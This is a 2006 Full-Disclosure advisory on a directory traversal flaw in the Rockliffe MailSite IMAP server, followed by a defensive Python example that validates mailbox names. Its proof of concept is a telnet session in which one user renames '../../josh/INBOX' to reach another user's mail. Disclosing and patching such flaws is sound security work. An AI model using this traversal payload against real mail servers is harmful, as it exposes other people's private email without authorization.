[Full-disclosure] Rockliffe Directory Traversal Vulnerability



Synopsis: Rockliffe's MailSite IMAP Directory Traversal Vulnerability.

Product: Rockliffe Mailsite
	 http://www.rockliffe.com

Version: Confirmed on MailSite < 6.1.22.1

Author: Josh Zlatin-Amishav

Date: January 4, 2006

Background:
Rockliffe MailSite secure email server software and MailSite MP secure email gateways provide email server solutions and gateway email protection for businesses and service providers. Rockliffe has more than 3,000 customers hosting more than 15 million mailboxes worldwide.


Issue:
In working with researchers at Tenable Network Security, I have come across a directory traversal flaw in the IMAP server. It is possible for an authenticated user to access any user's inbox via a RENAME command.


PoC:

josh@lab1:~$ telnet 10.0.0.5 143
Trying 10.0.0.5...
Connected to 10.0.0.5.
Escape character is '^]'.
* OK  MailSite IMAP4 Server 6.1.22.0 ready
a1 login joe pass
a1 OK LOGIN completed
a2 rename ../../josh/INBOX gotcha
a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
a3 select gotcha
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* 0 EXISTS
* 0 RECENT
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
* OK [UNSEEN 0]
* OK [UIDVALIDITY 514563061] UIDs are valid
a3 OK [READ-WRITE] opened gotcha

User joe can now access the contents of user josh's INBOX directory.

Vendor notified: January 3, 2006 06:12AM

Vendor Response:
Contact your sales rep about purchasing Mailsite 7.0.3.1

Solution:
MailSite fixed a buffer overrun in the MailSite IMAP server, which also fixes the directory traversal problem. Either upgrade to version 6.1.22 and install the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of MailSite. The hotfix can be obtained at:


ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe

References: http://www.rockliffe.com
References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
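
The RENAME in the PoC above succeeds because the mailbox name "../../josh/INBOX" is resolved outside joe's own folder tree. The following is an added example, not part of the original advisory and not MailSite code, of the containment check an IMAP server can apply to both RENAME arguments; the per-user directory layout, the store path and the function names are assumptions.

```python
# Added example: mailbox-name containment check for IMAP RENAME.
# Assumption: each user's folders live under <store>/<user>/ on disk.
import posixpath


class MailboxNameError(ValueError):
    """Raised when a client-supplied mailbox name is not acceptable."""


def resolve_mailbox(user_root, name):
    """Map a client-supplied mailbox name to a path inside user_root."""
    # NUL truncates paths in C APIs; ':' allows drive/stream syntax on Windows.
    if not name or "\x00" in name or ":" in name:
        raise MailboxNameError("illegal character or empty name")
    # Treat both separators as delimiters so "..\\.." is caught as well.
    parts = name.replace("\\", "/").split("/")
    # "" covers absolute names ("/x"), doubled and trailing delimiters.
    if any(p in ("", ".", "..") for p in parts):
        raise MailboxNameError("relative or empty path component")
    root = posixpath.normpath(user_root)
    path = posixpath.normpath(posixpath.join(root, *parts))
    # Defence in depth: the normalised result must still sit under the root.
    if posixpath.commonpath([root, path]) != root:
        raise MailboxNameError("mailbox escapes user root")
    return path


def handle_rename(tag, user_root, src, dst):
    """Return the tagged IMAP response for 'RENAME src dst'."""
    try:
        old = resolve_mailbox(user_root, src)
        new = resolve_mailbox(user_root, dst)
    except MailboxNameError as exc:
        return f"{tag} NO RENAME rejected: {exc}"
    # A real server would perform the on-disk rename old -> new here.
    return f"{tag} OK RENAME completed ({old} -> {new})"


if __name__ == "__main__":
    root = "/var/mailstore/joe"  # constructed store path for user joe
    print(handle_rename("a2", root, "../../josh/INBOX", "gotcha"))
    print(handle_rename("a3", root, "Archive/2005", "Old"))
```

The same check belongs on every command that takes a mailbox name (SELECT, CREATE, DELETE and so on), not only RENAME.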


